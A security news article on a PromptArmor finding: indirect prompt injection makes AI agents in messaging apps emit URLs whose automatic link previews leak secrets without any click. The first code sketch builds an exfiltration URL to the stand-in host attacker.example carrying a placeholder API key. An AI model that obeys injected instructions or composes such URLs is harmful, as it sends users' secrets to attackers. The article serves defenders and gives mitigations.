AI agents running inside messaging apps can leak sensitive data through automatic link previews, researchers at AI security firm PromptArmor have warned, creating a zero-click data exfiltration risk.

The flaw reportedly exploits indirect prompt injection: malicious instructions hidden in content the agent processes, such as a shared document or an inbound message, trick it into generating a URL that points to an attacker-controlled server and carries sensitive information, such as API keys, in its query string. Messaging platforms like Slack, Teams, Telegram and Discord often fetch links automatically to generate previews, meaning the data-leaking URL can be requested instantly, without the user clicking it.
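The pattern can be reproduced in miniature. The sketch below is illustrative only: the attacker.example endpoint is hypothetical and the secret is a placeholder. It shows how a URL composed by a compromised agent would hand its query string to whichever server the preview fetcher contacts:

```python
# Minimal sketch of the exfiltration pattern described above.
# "attacker.example" is a hypothetical attacker-controlled host and
# the secret is a placeholder, not real data.
from urllib.parse import urlencode, urlparse, parse_qs

# Step 1: injected instructions (e.g. hidden in a document the agent
# reads) persuade the agent to emit a link embedding data from its
# context in the query string.
leaked_secret = "sk-test-1234567890abcdef"  # placeholder API key
exfil_url = "https://attacker.example/collect?" + urlencode({"k": leaked_secret})

# Step 2: the messaging platform's link-preview service fetches the
# URL automatically (a plain HTTP GET), so the attacker's server
# receives the query string with no user click. Here we simply show
# what that server would see in its access log.
query = parse_qs(urlparse(exfil_url).query)
print(f"GET /collect?k=... -> attacker's log records: {query['k'][0]}")
```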

PromptArmor said: “In agentic systems with link previews, data exfiltration can occur immediately upon the AI agent responding to the user, without the user needing to click the malicious link.”

To test exposure, the firm created the AITextRisk.com website, which logs preview fetches from different agent and app combinations. Reported at-risk pairings include Microsoft Teams with Copilot Studio and Telegram with OpenClaw, the latter being exposed by default unless link previews are disabled in its configuration.
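A comparable test bed can be stood up locally. The sketch below is a hypothetical stand-in for the kind of logging AITextRisk.com performs, not PromptArmor's actual code; it records the User-Agent and path of every inbound fetch, since preview crawlers typically identify themselves in that header, letting at-risk pairings reveal themselves:

```python
# Hypothetical preview-fetch logger using only the standard library.
# Point a link at this host from a channel where an agent is active;
# any automatic preview fetch shows up here. Port is illustrative.
from http.server import BaseHTTPRequestHandler, HTTPServer
from datetime import datetime, timezone

class PreviewLogger(BaseHTTPRequestHandler):
    def do_GET(self):
        # Preview crawlers generally send an identifying User-Agent;
        # log it alongside the requested path and query string.
        ua = self.headers.get("User-Agent", "unknown")
        ts = datetime.now(timezone.utc).isoformat()
        print(f"{ts} | {ua} | fetched {self.path}")
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"ok")

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), PreviewLogger).serve_forever()
```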

Businesses running AI agents in messaging platforms should urgently review link preview settings, disable previews in sensitive channels where possible, restrict agents' access to secrets, and test their own app and agent pairings to identify potential zero-click data loss.
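Where the agent itself composes the outgoing message, previews can often be suppressed at send time. As a sketch, assuming a Telegram bot integration, the call below disables the preview on an outbound message; BOT_TOKEN and CHAT_ID are placeholders, and the exact parameter name should be verified against the current Bot API documentation:

```python
# Sketch: suppress link previews on messages an agent sends via a
# Telegram bot. BOT_TOKEN and CHAT_ID are hypothetical placeholders.
import requests

BOT_TOKEN = "123456:ABC-placeholder"
CHAT_ID = "123456789"

resp = requests.post(
    f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage",
    json={
        "chat_id": CHAT_ID,
        "text": "Agent reply; any links stay un-previewed.",
        # Newer Bot API versions use link_preview_options; older ones
        # accepted disable_web_page_preview. Check the docs you target.
        "link_preview_options": {"is_disabled": True},
    },
    timeout=10,
)
resp.raise_for_status()
```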